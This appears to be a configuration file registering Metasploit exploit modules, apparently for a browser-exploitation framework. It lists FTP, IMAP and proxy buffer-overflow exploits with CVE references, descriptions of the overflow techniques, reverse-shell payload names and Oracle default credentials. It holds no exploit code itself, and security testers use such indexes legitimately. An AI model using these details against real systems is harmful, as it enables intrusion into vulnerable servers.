- http://www.exploit-db.com/exploits/14399/
path: extensions/metasploit/
class: Msf_module
msf_ftppad_list_reply:
enable: true
msf: true
msf_key: windows/ftp/ftppad_list_reply
name: FTPPad 1.2.0 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the FTPPad 1.2.0 ftp client. The overflow is\n\
\t\t\t\ttriggered when the client connects to an FTP server which sends an overly long directory\n\
\t\t\t\tand filename in response to a LIST command.\n\n\
\t\t\t\tThis will cause an access violation, and will eventually overwrite the saved extended\n\
\t\t\t\tinstruction pointer. Payload can be found at EDX+5c and ESI+5c, so a little pivot/\n\
\t\t\t\tsniper was needed to make this one work.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_aasync_list_reply:
enable: true
msf: true
msf_key: windows/ftp/aasync_list_reply
name: AASync v2.2.1.0 (Win32) Stack Buffer Overflow (LIST)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in AASync v2.2.1.0, triggered when\n\
\t\t\t\tprocessing the response on a LIST command. During the overflow, a structured exception\n\
\t\t\t\thandler record gets overwritten.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_wsftp_server_505_xmd5:
enable: true
msf: true
msf_key: windows/ftp/wsftp_server_505_xmd5
name: Ipswitch WS_FTP Server 5.05 XMD5 Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the XMD5 verb in\n\
\t\t\t\tIPSWITCH WS_FTP Server 5.05.\n\
\t\t\t"
authors:
- - CVE
- 2006-4847
- - OSVDB
- "28939"
- - BID
- "20076"
path: extensions/metasploit/
class: Msf_module
msf_goldenftp_pass_bof:
enable: true
msf: true
msf_key: windows/ftp/goldenftp_pass_bof
name: GoldenFTP PASS Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the Golden FTP service, using the PASS\n\
\t\t\t\tcommand to cause a buffer overflow. Please note that in order to trigger the vulnerable\n\
\t\t\t\tcode, the victim machine must have the \"Show new connections\" setting enabled. By\n\
\t\t\t\tdefault, this option is unchecked.\n\
\t\t\t"
authors:
- - CVE
- 2006-6576
- - OSVDB
- "35951"
- - BID
- "45957"
- - URL
- http://www.exploit-db.com/exploits/16036/
path: extensions/metasploit/
class: Msf_module
msf_warftpd_165_user:
enable: true
msf: true
msf_key: windows/ftp/warftpd_165_user
name: War-FTPD 1.65 Username Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow found in the USER command\n\
\t\t\t\tof War-FTPD 1.65.\n\
\t\t\t"
authors:
- - CVE
- 1999-0256
- - OSVDB
- "875"
- - BID
- "10078"
- - URL
- http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html
path: extensions/metasploit/
class: Msf_module
msf_sami_ftpd_user:
enable: true
msf: true
msf_key: windows/ftp/sami_ftpd_user
name: KarjaSoft Sami FTP Server v2.02 USER Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the KarjaSoft Sami FTP Server version 2.02\n\
\t\t\t\tby sending an excessively long USER string. The stack is overwritten\n\
\t\t\t\twhen the administrator attempts to view the FTP logs. Therefore, this exploit\n\
\t\t\t\tis passive and requires end-user interaction. Keep this in mind when selecting\n\
\t\t\t\tpayloads. When the server is restarted, it will re-execute the exploit until\n\
\t\t\t\tthe logfile is manually deleted via the file system.\n\
\t\t\t"
authors:
- - CVE
- 2006-0441
- - CVE
- 2006-2212
- - OSVDB
- "25670"
- - BID
- "16370"
- - BID
- "22045"
- - BID
- "17835"
- - URL
- http://www.milw0rm.com/exploits/1448
- - URL
- http://www.milw0rm.com/exploits/1452
- - URL
- http://www.milw0rm.com/exploits/1462
- - URL
- http://www.milw0rm.com/exploits/3127
- - URL
- http://www.milw0rm.com/exploits/3140
path: extensions/metasploit/
class: Msf_module
msf_oracle9i_xdb_ftp_unlock:
enable: true
msf: true
msf_key: windows/ftp/oracle9i_xdb_ftp_unlock
name: Oracle 9i XDB FTP UNLOCK Overflow (win32)
category: Metasploit
description: "\n\
\t\t\t\t\tBy passing an overly long token to the UNLOCK command, a\n\
\t\t\t\tstack based buffer overflow occurs. David Litchfield has\n\
\t\t\t\tillustrated multiple vulnerabilities in the Oracle 9i XML\n\
\t\t\t\tDatabase (XDB), during a seminar on \"Variations in exploit\n\
\t\t\t\tmethods between Linux and Windows\" presented at the Blackhat\n\
\t\t\t\tconference. Oracle9i includes a number of default accounts,\n\
\t\t\t\tincluding dbsnmp:dbsmp, scott:tiger, system:manager, and\n\
\t\t\t\tsys:change_on_install.\n\
\t\t\t"
authors:
- - CVE
- 2003-0727
- - OSVDB
- "2449"
- - BID
- "8375"
- - URL
- http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-litchfield-paper.pdf
path: extensions/metasploit/
class: Msf_module
msf_leapftp_list_reply:
enable: true
msf: true
msf_key: windows/ftp/leapftp_list_reply
name: LeapFTP 3.0.1 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the LeapFTP 3.0.1 client.\n\
\t\t\t\tThis issue is triggered when a file with a long name is downloaded/opened.\n\
\t\t\t"
authors:
- - OSVDB
- "68640"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_trellian_client_pasv:
enable: true
msf: true
msf_key: windows/ftp/trellian_client_pasv
name: Trellian FTP Client 3.01 PASV Remote Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Trellian 3.01 FTP client that is triggered\n\
\t\t\t\tthrough an excessively long PASV message.\n\
\t\t\t"
authors:
- - CVE
- 2010-1465
- - OSVDB
- "63812"
- - URL
- http://www.exploit-db.com/exploits/12152
path: extensions/metasploit/
class: Msf_module
msf_vermillion_ftpd_port:
enable: true
msf: true
msf_key: windows/ftp/vermillion_ftpd_port
name: Vermillion FTP Daemon PORT Command Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an out-of-bounds array access in the Arcane Software\n\
\t\t\t\tVermillion FTP server. By sending a specially crafted FTP PORT command,\n\
\t\t\t\tan attacker can corrupt stack memory and execute arbitrary code.\n\n\
\t\t\t\tThis particular issue is caused by processing data bound by attacker\n\
\t\t\t\tcontrolled input while writing into a 4 byte stack buffer. Unfortunately,\n\
\t\t\t\tthe writing that occurs is not a simple byte copy.\n\n\
\t\t\t\tProcessing is done using a source ptr (p) and a destination pointer (q).\n\
\t\t\t\tThe vulnerable function walks the input string and continues while the\n\
\t\t\t\tsource byte is non-null. If a comma is encountered, the function increments\n\
\t\t\t\tthe destination pointer. If an ascii digit [0-9] is encountered, the\n\
\t\t\t\tfollowing occurs:\n\n\
\t\t\t\t\t*q = (*q * 10) + (*p - '0');\n\n\
\t\t\t\tAll other input characters are ignored in this loop.\n\n\
\t\t\t\tAs a consequence, an attacker must craft input such that modifications\n\
\t\t\t\tto the current values on the stack result in usable values. In this exploit,\n\
\t\t\t\tthe low two bytes of the return address are adjusted to point at the\n\
\t\t\t\tlocation of a 'call edi' instruction within the binary. This was chosen\n\
\t\t\t\tsince 'edi' points at the source buffer when the function returns.\n\n\
\t\t\t\tNOTE: This server can be installed as a service using \"vftpd.exe install\".\n\
\t\t\t\tIf so, the service does not restart automatically, giving an attacker only\n\
\t\t\t\tone attempt.\n\
\t\t\t"
authors:
- - OSVDB
- "62163"
- - URL
- http://www.exploit-db.com/exploits/11293
- - URL
- http://www.global-evolution.info/news/files/vftpd/vftpd.txt
path: extensions/metasploit/
class: Msf_module
msf_cesarftp_mkd:
enable: true
msf: true
msf_key: windows/ftp/cesarftp_mkd
name: Cesar FTP 0.99g MKD Command Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the MKD verb in CesarFTP 0.99g.\n\n\
\t\t\t\tYou must have valid credentials to trigger this vulnerability. Also, you\n\
\t\t\t\tonly get one chance, so choose your target carefully.\n\
\t\t\t"
authors:
- - CVE
- 2006-2961
- - OSVDB
- "26364"
- - BID
- "18586"
- - URL
- http://secunia.com/advisories/20574/
path: extensions/metasploit/
class: Msf_module
msf_easyftp_cwd_fixret:
enable: true
msf: true
msf_key: windows/ftp/easyftp_cwd_fixret
name: EasyFTP Server <= 1.7.0.11 CWD Command Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EasyFTP Server 1.7.0.11\n\
\t\t\t\tand earlier. EasyFTP fails to check input size when parsing 'CWD' commands, which\n\
\t\t\t\tleads to a stack based buffer overflow. EasyFTP allows anonymous access by\n\
\t\t\t\tdefault; valid credentials are typically unnecessary to exploit this vulnerability.\n\n\
\t\t\t\tAfter version 1.7.0.12, this package was renamed \"UplusFtp\".\n\n\
\t\t\t\tThis exploit utilizes a small piece of code that I've referred to as 'fixRet'.\n\
\t\t\t\tThis code allows us to inject a payload of ~500 bytes into a 264 byte buffer by\n\
\t\t\t\t'fixing' the return address post-exploitation. See references for more information.\n\
\t\t\t"
authors:
- - OSVDB
- "62134"
- - URL
- http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
- - URL
- http://paulmakowski.wordpress.com/2010/04/19/metasploit-plugin-for-easyftp-server-exploit
- - URL
- http://seclists.org/bugtraq/2010/Feb/202
- - URL
- http://code.google.com/p/easyftpsvr/
- - URL
- https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip
- - URL
- http://www.securityfocus.com/bid/38262/exploit
path: extensions/metasploit/
class: Msf_module
msf_wsftp_server_503_mkd:
enable: true
msf: true
msf_key: windows/ftp/wsftp_server_503_mkd
name: WS-FTP Server 5.03 MKD Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits the buffer overflow found in the MKD\n\
\t\t\t\tcommand in IPSWITCH WS_FTP Server 5.03 discovered by Reed\n\
\t\t\t\tArvin.\n\
\t\t\t"
authors:
- - CVE
- 2004-1135
- - OSVDB
- "12509"
- - BID
- "11772"
path: extensions/metasploit/
class: Msf_module
msf_ms09_053_ftpd_nlst:
enable: true
msf: true
msf_key: windows/ftp/ms09_053_ftpd_nlst
name: Microsoft IIS FTP Server NLST Response Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow flaw in the Microsoft IIS FTP\n\
\t\t\t\tservice. The flaw is triggered when a special NLST argument is passed\n\
\t\t\t\twhile the session has changed into a long directory path. For this exploit\n\
\t\t\t\tto work, the FTP server must be configured to allow write access to the\n\
\t\t\t\tfile system (either anonymously or in conjunction with a real account)\n\
\t\t\t"
authors:
- - URL
- http://milw0rm.com/exploits/9541
- - CVE
- 2009-3023
- - OSVDB
- "57589"
- - BID
- "36189"
- - MSB
- MS09-053
path: extensions/metasploit/
class: Msf_module
msf_xlink_server:
enable: true
msf: true
msf_key: windows/ftp/xlink_server
name: Xlink FTP Server Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xlink FTP Server\n\
\t\t\t\tthat comes bundled with Omni-NFS Enterprise 5.2.\n\
\t\t\t\tWhen an overly long FTP request is sent to the server,\n\
\t\t\t\tarbitrary code may be executed.\n\
\t\t\t"
authors:
- - CVE
- 2006-5792
- - OSVDB
- "58646"
- - URL
- http://www.metasploit.com/
- - URL
- http://www.xlink.com
path: extensions/metasploit/
class: Msf_module
msf_seagull_list_reply:
enable: true
msf: true
msf_key: windows/ftp/seagull_list_reply
name: Seagull FTP v3.3 build 409 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Seagull FTP client that gets\n\
\t\t\t\ttriggered when the ftp client processes a response to a LIST command. If the\n\
\t\t\t\tresponse contains an overly long file/folder name, a buffer overflow occurs,\n\
\t\t\t\toverwriting a structured exception handler.\n\
\t\t\t"
authors:
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_warftpd_165_pass:
enable: true
msf: true
msf_key: windows/ftp/warftpd_165_pass
name: War-FTPD 1.65 Password Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis exploits the buffer overflow found in the PASS command\n\
\t\t\t\tin War-FTPD 1.65. This particular module will only work\n\
\t\t\t\treliably against Windows 2000 targets. The server must be\n\
\t\t\t\tconfigured to allow anonymous logins for this exploit to\n\
\t\t\t\tsucceed. A failed attempt will bring down the service\n\
\t\t\t\tcompletely.\n\
\t\t\t"
authors:
- - CVE
- 1999-0256
- - OSVDB
- "875"
- - BID
- "10078"
- - URL
- http://lists.insecure.org/lists/bugtraq/1998/Feb/0014.html
path: extensions/metasploit/
class: Msf_module
msf_sasser_ftpd_port:
enable: true
msf: true
msf_key: windows/ftp/sasser_ftpd_port
name: Sasser Worm avserve FTP PORT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the FTP server component of the Sasser worm.\n\
\t\t\t\tBy sending an overly long PORT command the stack can be overwritten.\n\
\t\t\t"
authors:
- - OSVDB
- "6197"
path: extensions/metasploit/
class: Msf_module
msf_leapftp_pasv_reply:
enable: true
msf: true
msf_key: windows/ftp/leapftp_pasv_reply
name: LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the LeapWare LeapFTP v2.7.3.600\n\
\t\t\t\tclient that is triggered through an excessively long PASV reply command. This\n\
\t\t\t\tmodule was ported from the original exploit by drG4njubas with minor improvements.\n\
\t\t\t"
authors:
- - CVE
- 2003-0558
- - OSVDB
- "4587"
- - BID
- "7860"
- - URL
- http://www.milw0rm.com/exploits/54
path: extensions/metasploit/
class: Msf_module
msf_gekkomgr_list_reply:
enable: true
msf: true
msf_key: windows/ftp/gekkomgr_list_reply
name: Gekko Manager FTP Client Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Gekko Manager ftp client, triggered when\n\
\t\t\t\tprocessing the response received after sending a LIST request. If this response contains\n\
\t\t\t\ta long filename, a buffer overflow occurs, overwriting a structured exception handler.\n\
\t\t\t"
authors:
- - OSVDB
- "68641"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_ftpgetter_pwd_reply:
enable: true
msf: true
msf_key: windows/ftp/ftpgetter_pwd_reply
name: FTPGetter Standard v3.55.0.05 Stack Buffer Overflow (PWD)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in FTPGetter Standard v3.55.0.05 ftp client.\n\
\t\t\t\tWhen processing the response on a PWD command, a stack based buffer overflow occurs.\n\
\t\t\t\tThis leads to arbitrary code execution when a structured exception handler gets\n\
\t\t\t\toverwritten.\n\
\t\t\t"
authors:
- - OSVDB
- "68638"
- - URL
- http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/
path: extensions/metasploit/
class: Msf_module
msf_netterm_netftpd_user:
enable: true
msf: true
msf_key: windows/ftp/netterm_netftpd_user
name: NetTerm NetFTPD USER Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability in the NetTerm NetFTPD\n\
\t\t\t\tapplication, which is part of the NetTerm package.\n\
\t\t\t\tThis module uses the USER command to trigger the overflow.\n\
\t\t\t"
authors:
- - CVE
- 2005-1323
- - OSVDB
- "15865"
- - URL
- http://seclists.org/lists/fulldisclosure/2005/Apr/0578.html
- - BID
- "13396"
path: extensions/metasploit/
class: Msf_module
msf_freeftpd_user:
enable: true
msf: true
msf_key: windows/ftp/freeftpd_user
name: freeFTPd 1.0 Username Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the freeFTPd\n\
\t\t\t\tmulti-protocol file transfer service. This flaw can only be\n\
\t\t\t\texploited when logging has been enabled (non-default).\n\
\t\t\t"
authors:
- - CVE
- 2005-3683
- - OSVDB
- "20909"
- - BID
- "15457"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html
path: extensions/metasploit/
class: Msf_module
msf_servu_mdtm:
enable: true
msf: true
msf_key: windows/ftp/servu_mdtm
name: Serv-U FTPD MDTM Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the Serv-U's MDTM command timezone\n\
\t\t\t\toverflow. It has been heavily tested against versions\n\
\t\t\t\t4.0.0.4/4.1.0.0/4.1.0.3/5.0.0.0 with success against\n\
\t\t\t\tnt4/2k/xp/2k3. I have also had success against version 3,\n\
\t\t\t\tbut only tested 1 version/os. The bug is in all versions\n\
\t\t\t\tprior to 5.0.0.4, but this exploit will not work against\n\
\t\t\t\tversions not listed above. You only get one shot, but it\n\
\t\t\t\tshould be OS/SP independent.\n\n\
\t\t\t\tThis exploit is a single hit, the service dies after the\n\
\t\t\t\tshellcode finishes execution.\n\
\t\t\t"
authors:
- - CVE
- 2004-0330
- - OSVDB
- "4073"
- - URL
- http://archives.neohapsis.com/archives/bugtraq/2004-02/0654.html
- - URL
- http://www.cnhonker.com/advisory/serv-u.mdtm.txt
- - URL
- http://www.cnhonker.com/index.php?module=releases&act=view&type=3&id=54
- - BID
- "9751"
path: extensions/metasploit/
class: Msf_module
msf_mercur_imap_select_overflow:
enable: true
msf: true
msf_key: windows/imap/mercur_imap_select_overflow
name: Mercur v5.0 IMAP SP3 SELECT Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tMercur v5.0 IMAP server is prone to a remotely exploitable\n\
\t\t\t\tstack-based buffer overflow vulnerability. This issue is due\n\
\t\t\t\tto a failure of the application to properly bounds check\n\
\t\t\t\tuser-supplied data prior to copying it to a fixed size memory buffer.\n\
\t\t\t\tCredit to Tim Taylor for discovering the vulnerability.\n\
\t\t\t"
authors:
- - CVE
- 2006-1255
- - OSVDB
- "23950"
- - BID
- "17138"
path: extensions/metasploit/
class: Msf_module
msf_eudora_list:
enable: true
msf: true
msf_key: windows/imap/eudora_list
name: Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in the Qualcomm WorldMail IMAP Server\n\
\t\t\t\tversion 3.0 (builds 6.1.19.0 through 6.1.22.0). Version 6.1.22.1 fixes this\n\
\t\t\t\tparticular vulnerability.\n\n\
\t\t\t\tNOTE: The service does NOT restart automatically by default. You may be limited to\n\
\t\t\t\tonly one attempt, so choose wisely!\n\
\t\t\t"
authors:
- - CVE
- 2005-4267
- - OSVDB
- "22097"
- - BID
- "15980"
path: extensions/metasploit/
class: Msf_module
msf_mailenable_w3c_select:
enable: true
msf: true
msf_key: windows/imap/mailenable_w3c_select
name: MailEnable IMAPD W3C Logging Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the W3C logging\n\
\t\t\t\tfunctionality of the MailEnable IMAPD service. Logging is\n\
\t\t\t\tnot enabled by default and this exploit requires a valid\n\
\t\t\t\tusername and password to exploit the flaw. MailEnable\n\
\t\t\t\tProfessional version 1.6 and prior and MailEnable Enterprise\n\
\t\t\t\tversion 1.1 and prior are affected.\n\
\t\t\t"
authors:
- - CVE
- 2005-3155
- - OSVDB
- "19842"
- - BID
- "15006"
path: extensions/metasploit/
class: Msf_module
msf_mdaemon_fetch:
enable: true
msf: true
msf_key: windows/imap/mdaemon_fetch
name: MDaemon 9.6.4 IMAPD FETCH Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the Alt-N MDaemon IMAP Server\n\
\t\t\t\tversion 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP\n\
\t\t\t\taccount credentials are required. Credit to Matteo Memelli.\n\
\t\t\t"
authors:
- - CVE
- 2008-1358
- - OSVDB
- "43111"
- - BID
- "28245"
- - URL
- http://www.milw0rm.com/exploits/5248
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_subscribe:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_subscribe
name: Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP SUBSCRIBE\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2006-6761
- - OSVDB
- "31360"
- - BID
- "21728"
- - URL
- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=454
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_auth:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_auth
name: Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's NetMail 3.52 IMAP AUTHENTICATE\n\
\t\t\t\tGSSAPI command. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution. Using the PAYLOAD of windows/shell_bind_tcp\n\
\t\t\t\tor windows/shell_reverse_tcp allows for the most reliable results.\n\
\t\t\t"
authors:
- - OSVDB
- "55175"
- - URL
- http://www.w00t-shell.net/#
path: extensions/metasploit/
class: Msf_module
msf_mailenable_status:
enable: true
msf: true
msf_key: windows/imap/mailenable_status
name: MailEnable IMAPD (1.54) STATUS Request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tMailEnable's IMAP server contains a buffer overflow\n\
\t\t\t\tvulnerability in the STATUS command. With proper\n\
\t\t\t\tcredentials, this could allow for the execution of arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2005-2278
- - OSVDB
- "17844"
- - BID
- "14243"
- - NSS
- "19193"
path: extensions/metasploit/
class: Msf_module
msf_mdaemon_cram_md5:
enable: true
msf: true
msf_key: windows/imap/mdaemon_cram_md5
name: Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the CRAM-MD5\n\
\t\t\t\tauthentication of the MDaemon IMAP service. This\n\
\t\t\t\tvulnerability was discovered by Muts.\n\
\t\t\t"
authors:
- - CVE
- 2004-1520
- - OSVDB
- "11838"
- - BID
- "11675"
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_status:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_status
name: Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP STATUS\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2005-3314
- - OSVDB
- "20956"
- - BID
- "15491"
path: extensions/metasploit/
class: Msf_module
msf_mercury_login:
enable: true
msf: true
msf_key: windows/imap/mercury_login
name: Mercury/32 <= 4.01b LOGIN Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack buffer overflow in Mercury/32 <= 4.01b IMAPD\n\
\t\t\t\tLOGIN verb. By sending a specially crafted login command, a buffer\n\
\t\t\t\tis corrupted, and code execution is possible. This vulnerability was\n\
\t\t\t\tdiscovered by (mu-b at digit-labs.org).\n\
\t\t\t"
authors:
- - CVE
- 2007-1373
- - OSVDB
- "33883"
path: extensions/metasploit/
class: Msf_module
msf_mailenable_login:
enable: true
msf: true
msf_key: windows/imap/mailenable_login
name: MailEnable IMAPD (2.34/2.35) Login Request Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tMailEnable's IMAP server contains a buffer overflow\n\
\t\t\t\tvulnerability in the Login command.\n\
\t\t\t"
authors:
- - CVE
- 2006-6423
- - OSVDB
- "32125"
- - BID
- "21492"
- - URL
- http://lists.grok.org.uk/pipermail/full-disclosure/2006-December/051229.html
path: extensions/metasploit/
class: Msf_module
msf_ipswitch_search:
enable: true
msf: true
msf_key: windows/imap/ipswitch_search
name: Ipswitch IMail IMAP SEARCH Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Ipswitch IMail Server 2006.1 IMAP SEARCH\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t\tIn order for this module to be successful, the IMAP user must have at least one\n\
\t\t\t\tmessage.\n\
\t\t\t"
authors:
- - CVE
- 2007-3925
- - OSVDB
- "36219"
- - BID
- "24962"
path: extensions/metasploit/
class: Msf_module
msf_mercury_rename:
enable: true
msf: true
msf_key: windows/imap/mercury_rename
name: Mercury/32 v4.01a IMAP RENAME Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow vulnerability in the\n\
\t\t\t\tMercury/32 v.4.01a IMAP service.\n\
\t\t\t"
authors:
- - CVE
- 2004-1211
- - OSVDB
- "12508"
- - BID
- "11775"
- - NSS
- "15867"
path: extensions/metasploit/
class: Msf_module
msf_novell_netmail_append:
enable: true
msf: true
msf_key: windows/imap/novell_netmail_append
name: Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Novell's Netmail 3.52 IMAP APPEND\n\
\t\t\t\tverb. By sending an overly long string, an attacker can overwrite the\n\
\t\t\t\tbuffer and control program execution.\n\
\t\t\t"
authors:
- - CVE
- 2006-6425
- - OSVDB
- "31362"
- - BID
- "21723"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-06-054.html
path: extensions/metasploit/
class: Msf_module
msf_mercur_login:
enable: true
msf: true
msf_key: windows/imap/mercur_login
name: Mercur Messaging 2005 IMAP Login Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Atrium Mercur IMAP 5.0 SP3.\n\
\t\t\t\tSince the room for shellcode is small, using the reverse ordinal payloads\n\
\t\t\t\tyields the best results.\n\
\t\t\t"
authors:
- - CVE
- 2006-1255
- - OSVDB
- "23950"
- - BID
- "17138"
- - URL
- http://archives.neohapsis.com/archives/fulldisclosure/2006-03/1104.html
path: extensions/metasploit/
class: Msf_module
msf_imail_delete:
enable: true
msf: true
msf_key: windows/imap/imail_delete
name: IMail IMAP4D Delete Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the 'DELETE'\n\
\t\t\t\tcommand of the IMail IMAP4D service. This vulnerability\n\
\t\t\t\tcan only be exploited with a valid username and password.\n\
\t\t\t\tThis flaw was patched in version 8.14.\n\
\t\t\t"
authors:
- - CVE
- 2004-1520
- - OSVDB
- "11838"
- - BID
- "11675"
path: extensions/metasploit/
class: Msf_module
msf_ccproxy_telnet_ping:
enable: true
msf: true
msf_key: windows/proxy/ccproxy_telnet_ping
name: CCProxy <= v6.2 Telnet Proxy Ping Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits the YoungZSoft CCProxy <= v6.2 suite\n\
\t\t\t\tTelnet service. The stack is overwritten when sending an overly\n\
\t\t\t\tlong address to the 'ping' command.\n\
\t\t\t"
authors:
- - CVE
- 2004-2416
- - OSVDB
- "11593"
- - BID
- "11666"
- - URL
- http://milw0rm.com/exploits/621
path: extensions/metasploit/
class: Msf_module
msf_qbik_wingate_wwwproxy:
enable: true
msf: true
msf_key: windows/proxy/qbik_wingate_wwwproxy
name: Qbik WinGate WWW Proxy Server URL Processing Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Qbik WinGate version\n\
\t\t\t\t6.1.1.1077 and earlier. By sending a malformed HTTP POST URL to the\n\
\t\t\t\tHTTP proxy service on port 80, a remote attacker could overflow\n\
\t\t\t\ta buffer and execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2006-2926
- - OSVDB
- "26214"
- - BID
- "18312"
path: extensions/metasploit/
class: Msf_module
msf_proxypro_http_get:
enable: true
msf: true
msf_key: windows/proxy/proxypro_http_get
name: Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Proxy-Pro Professional\n\
\t\t\t\tGateKeeper 4.7. By sending a long HTTP GET to the default port\n\
\t\t\t\tof 3128, a remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2004-0326
- - OSVDB
- "4027"
- - BID
- "9716"
path: extensions/metasploit/
class: Msf_module
msf_bluecoat_winproxy_host:
enable: true
msf: true
msf_key: windows/proxy/bluecoat_winproxy_host
name: Blue Coat WinProxy Host Header Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Blue Coat Systems WinProxy\n\
\t\t\t\tservice by sending a long port value for the Host header in an HTTP\n\
\t\t\t\trequest.\n\
\t\t\t"
authors:
- - CVE
- 2005-4085
- - OSVDB
- "22238"
- - BID
- "16147"
- - URL
- http://www.bluecoat.com/support/knowledge/advisory_host_header_stack_overflow.html
path: extensions/metasploit/
class: Msf_module
msf_maxdb_webdbm_get_overflow:
enable: true
msf: true
msf_key: windows/http/maxdb_webdbm_get_overflow
name: MaxDB WebDBM GET Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in the MaxDB WebDBM\n\
\t\t\t\tservice. This service is included with many recent versions\n\
